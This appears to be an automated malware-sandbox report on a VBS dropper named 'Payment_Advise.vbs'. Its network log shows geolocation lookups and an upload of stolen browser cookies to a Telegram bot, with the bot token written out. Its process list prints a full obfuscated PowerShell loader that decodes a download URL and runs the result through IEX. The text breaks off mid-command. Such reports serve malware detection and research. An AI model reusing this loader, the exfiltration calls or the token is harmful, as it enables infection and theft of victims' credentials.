                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ymZBUVLwa5FO9VGDX0bR3HFUPhQxJMkzSIw1ysXXcNEW02N1Nsddb6ysTR%2Ff2vRIHwCkugcJN8tzlvc4jlT1FEXJ8TuKj5L0IVDvz%2BLUqs0vBCrNj527Q0vPa6pkc8O%2BLWvFHJ2r"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91f548dc39ba617f-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=42087&min_rtt=37569&rtt_var=17316&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=77084&cwnd=250&unsent_bytes=0&cid=e3500877f544e878&ts=571&x=0"
                                                                                2025-03-12 18:16:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.951196104.21.112.14436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:16:49 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2025-03-12 18:16:49 UTC854INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:49 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 211882
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UakHPK66lQVGIZD9W8arlqkpineJ5F1DNj0tqbpHwhSTZ48PMgff13K8wMgxJ91%2FAlXVXveRoUIs8gxDuiMZf3270AEUKZllLVl1OHbMQ2%2F3D7z0o8fsupQq8XrtrdZSG8jVerXB"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91f548eec9e660a6-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=87847&min_rtt=76540&rtt_var=51317&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4252&recv_bytes=699&delivery_rate=17410&cwnd=242&unsent_bytes=0&cid=5637f6a02f0ca458&ts=794&x=0"
                                                                                2025-03-12 18:16:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.951198104.21.112.14436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:16:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2025-03-12 18:16:52 UTC868INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 211885
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=45NhGnqd4f6E3PS7zTD39Bf%2FawoJPPYXD7oze4VIVq%2FYoTN5gnDNKltpj39T%2BrMWIc%2F5%2B6Bct7w4cxZ9NMU%2BJzBRlP%2BtmsZin85lLCaXg6u%2BWq1X6HaTWzuOGgDa3%2Flu7R8Zta6z"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91f54901dac78052-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=66634&min_rtt=48154&rtt_var=55019&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4248&recv_bytes=699&delivery_rate=14838&cwnd=251&unsent_bytes=0&cid=7f14d06c9457e1e6&ts=842&x=0"
                                                                                2025-03-12 18:16:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.951200104.21.112.14436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:16:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2025-03-12 18:16:55 UTC860INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 211888
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vCtjwL0s75O4Qy%2B3fgVI2BG1o4fuklVy%2BQjS7OSTBhlLhwPCs%2Fp8yol%2BnSyZDnBcxHn%2Fs2Zyf9L0xXXYuQKlrmCXm3TiluzlA9yOQ3trq3lINX5Cie5qq7ZborUTRBTkJdVl6PH3"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91f54913489e2333-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=52547&min_rtt=42768&rtt_var=35596&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4250&recv_bytes=699&delivery_rate=23989&cwnd=248&unsent_bytes=0&cid=92862ef234e31099&ts=595&x=0"
                                                                                2025-03-12 18:16:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.951202104.21.112.14436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:16:58 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2025-03-12 18:16:59 UTC866INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:58 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 211891
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPTc8%2FmAXK2Rb%2BnmOpoKVuEnwK3Fi8qM5cbH%2FgVf8Ao%2FUqmWE3GUAiszvBDJcWMu%2FkirjRtud2ahzmgfijHhkzw1%2FHfKA81tN%2BIIg9T05Q4wsMoAdfF%2FZVt1ZCqKY5YPHWQE0ioE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91f54927699286e4-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=31168&min_rtt=24907&rtt_var=21863&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4250&recv_bytes=699&delivery_rate=38808&cwnd=251&unsent_bytes=0&cid=d5d68da9d7049ea4&ts=971&x=0"
                                                                                2025-03-12 18:16:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.951204104.21.112.14436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:17:01 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2025-03-12 18:17:02 UTC855INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:17:01 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 211894
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkNO4vsC%2BIpOnnS4pV1acQx0L%2Bfr8QEVApA0Mgruhkf9u0gmU6pR0t4o3HgwdUzW6CdgSrAJf6potiPAZCNK1D5GFRLXAfukYjUfwd9FhGFvurD9n4FK8m5pHXNXI5eWiZAXv2tA"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91f5493a5e69dc06-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=115394&min_rtt=40232&rtt_var=63779&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=71982&cwnd=227&unsent_bytes=0&cid=e0e1920410c83b79&ts=607&x=0"
                                                                                2025-03-12 18:17:02 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.951205149.154.167.2204436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:17:04 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:651689%0D%0ADate%20and%20Time:%2013/03/2025%20/%2018:06:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20651689%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                Host: api.telegram.org
                                                                                Connection: Keep-Alive
                                                                                2025-03-12 18:17:04 UTC344INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0
                                                                                Date: Wed, 12 Mar 2025 18:17:04 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 55
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-03-12 18:17:04 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.951206149.154.167.2204436736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:17:12 UTC347OUTPOST /bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503224244&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd62db31f18cb7
                                                                                Host: api.telegram.org
                                                                                Content-Length: 740
                                                                                2025-03-12 18:17:12 UTC740OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 32 64 62 33 31 66 31 38 63 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 74 69 6e 61 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 36 35 31 36 38 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 32 2f 30 33 2f 32 30 32 35 20 2f 20
                                                                                Data Ascii: --------------------------8dd62db31f18cb7Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:651689Date and Time: 12/03/2025 /
                                                                                2025-03-12 18:17:13 UTC346INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.18.0
                                                                                Date: Wed, 12 Mar 2025 18:17:13 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 56
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-03-12 18:17:13 UTC56INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:14:15:19
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs"
                                                                                Imagebase:0x7ff7434e0000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:14:15:20
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff771cd0000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:14:15:31
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoProbpta epMor,eStrisProd]Ne n=K te$FunkBSpore ,lieFl.ctAfvnlprese');$elkesaite=Pachyhematous214 '.ack$Kn.pBDag eEnevtIngoaUn ulSquaiS ronC ttg,uresNo.oeForuvTambn.lite Pam.T.olD Ca o Praw uninstatl Unoo EftaEmbedSnouFBlaniKd.rlHormeGang(Tjen$ H,uIAnkemA.bep Us,e FosrA,taaFurntRi ai ,xyvVete, eb$ LuwAS,mlrAnagbsub e ExpjSubjdU desFr,sm orveScalt AdjoToivdGianeEc,orTurbn Sike Ud sTo p)';$Arbejdsmetodernes=$Glyn;Verdensbermthedernes242 (Pachyhematous214 'Flik$Pos,GCla L aruo decBHyalakat.LOver:Sy tmDkmaeDoorMdiapo Astr.emibUn eC tigRHegn=Over( Lovt.pauENsk S NonTCurm-F erp AmaaCirctNea.h tat Inte$I,sua Lb RMatebArveEOverJLed DEyepSsan mpa eEN ncTSto oPremd BegEIncuRScopnbrugeWinds Tro)');while (!$Memorbcr) {Verdensbermthedernes242 (Pachyhematous214 'Mid $TettgPejllEnmeoudg,bPr laPa al Uds: ChyE PrkfSpejtForaeLubrrstersDisttUmpir M sbSojaeimm.lKo.tsU,bue illr ClesFolk=Po,i$FermGStagiPrivg Chaa PunrSegntF ouiCorrnTy aa W,rlKaskeSouls') ;Verdensbermthedernes242 $elkesaite;Verdensbermthedernes242 (Pachyhematous214 'I,ra[ PibTIndsh FarRTeksEParaASursdB 